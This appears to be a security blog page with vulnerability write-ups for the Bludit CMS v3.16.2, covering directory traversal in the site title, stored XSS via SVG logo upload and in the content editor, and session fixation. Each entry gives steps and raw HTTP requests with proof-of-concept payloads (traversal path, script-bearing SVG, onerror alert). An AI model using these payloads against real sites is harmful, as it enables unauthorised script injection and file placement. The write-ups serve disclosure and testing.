Saturday, 19 July 2025

Friday Fun Pentest Series - 33 - Directory Traversal "Site Title" - bluditv3.16.2

Description

- It was noted that the application was vulnerable to Directory Traversal in the "Site Title" 

Directory Traversal "Site Title" #1: 

Steps to Reproduce:

  1. Login with admin account and "General" > "General"
  2. Set the "Site Title" to the following payload "../../../malicious"
  3. Next click on "Logo" and the upload the SVG file


// HTTP POST Request 

POST /bludit/admin/settings HTTP/1.1
Host: 192.168.58.133
[...]

[...]title=htdocs/bludit/bl-content/uploads/../../../malicious[...]


// HTTP Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 28 Jun 2025 21:27:33 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]


// HTTP POST Request Uploading SVG File

POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]

------geckoformboundaryb7a89b3d43771e77a278c9384a361332
Content-Disposition: form-data; name="tokenCSRF"

59fc6f48ad5d60b39699491cada2390e1b42531b
------geckoformboundaryb7a89b3d43771e77a278c9384a361332
Content-Disposition: form-data; name="inputFile"; filename="evilsvgfile-xss-bypass.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert('xss');</script>
</svg>
------geckoformboundaryb7a89b3d43771e77a278c9384a361332--


// HTTP Response

HTTP/1.1 200 OK
Date: Sat, 28 Jun 2025 21:28:21 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

{"status":0,"message":"Image uploaded.","filename":"..\/..\/..\/malicious.svg","absoluteURL":"http:\/\/192.168.58.133\/bludit\/bl-content\/uploads\/..\/..\/..\/malicious.svg","absolutePath":"\/opt\/lampp\/htdocs\/bludit\/bl-content\/uploads\/..\/..\/..\/malicious.svg"}


root@debian:/opt/lampp/htdocs# ls -lah
total 16K
drwxrwxrwx  3 root   root   4.0K Jun 28 17:28 .
drwxr-xr-x 31 root   root   4.0K Jun  3 16:26 ..
drwxrwxrwx  7 debian debian 4.0K Aug 25  2024 bludit
-rw-r--r--  1 daemon daemon  283 Jun 28 17:28 malicious.svg


// HTTP GET Request Accessing the SVG File

GET /malicious.svg?time=0.3289154512636364 HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sat, 28 Jun 2025 21:28:21 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert('xss');</script>
</svg>

Friday Fun Pentest Series - 32 - XSS via SVG File Upload - bluditv3.16.2

Description

- It was noted that the application was vulnerable to Stored XSS via SVG file upload


XSS via SVG File Upload #1:

Steps to Reproduce:
  1. Login with admin account and click on "General" > "Logo"

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert('xss');</script>
</svg>


// HTTP POST Request Uploading the SVG File

POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]

------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4
Content-Disposition: form-data; name="tokenCSRF"
59fc6f48ad5d60b39699491cada2390e1b42531b
------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4
Content-Disposition: form-data; name="inputFile"; filename="evilsvgfile-xss-bypass.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert('xss');</script>
</svg>

------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4--


// HTTP Response

HTTP/1.1 200 OK
Date: Sat, 28 Jun 2025 21:16:10 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]
{"status":0,"message":"Image uploaded.","filename":"test.svg","absoluteURL":"http:\/\/192.168.58.133\/bludit\/bl-content\/uploads\/test.svg","absolutePath":"\/opt\/lampp\/htdocs\/bludit\/bl-content\/uploads\/test.svg"}


Friday Fun Pentest Series - 31 - Stored XSS "Add New Content" Functionality - bluditv3.16.2

Description

- It was noted that the application was vulnerable to Stored Cross Site Scripting in the "Add New Content" functionality


Stored XSS "Add New Content" Functionality #1:

Steps to Reproduce:
  1. Login with admin account and visit "New Content"
  2. In the "Source Code" field enter the following parameter "<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">"
  3. Upon clicking on "Preview" the XSS payload would trigger


// HTTP POST request add new content

POST /bludit/admin/new-content HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]

tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043&type=published&coverImage=&content=<iframe><textarea></iframe><img+src%3d""+onerror%3d"alert(document.domain)">&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss


// HTTP response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 Jun 2025 19:16:04 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]


// HTTP GET request triggering the XSS

GET /bludit/admin/edit-content/xss HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]


// HTTP response

HTTP/1.0 200 OK
Date: Wed, 04 Jun 2025 19:16:06 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

[...]

<!-- Editor -->
<textarea id="jseditor" class="editable h-100" style=""><iframe><textarea></iframe><img+src%3d""+onerror%3d"alert(document.domain)">
[...]

Friday Fun Pentest Series - 30 - Session Fixation - bluditv3.16.2

Description

- It was noted that the application did not correctly reissue a new session upon logging into the application therefore was vulnerable to  Session Fixation


Session Fixation #1

Steps to Reproduce:
  1. Visit the login page. Login with valid user and observe that the sessionID has not been changed

// HTTP POST request logging in

POST /bludit/admin/ HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
tokenCSRF=551bee4a6e6d065481ec1d29d9b37335475ae1d0&username=admin&password=password&save=


// HTTP response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 Jun 2025 20:34:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

Friday Fun Pentest Series - 33 - Directory Traversal "Site Title" - bluditv3.16.2

Description - It was noted that the application was vulnerable to Directory Traversal in the "Site Title"  Directory Traversal ...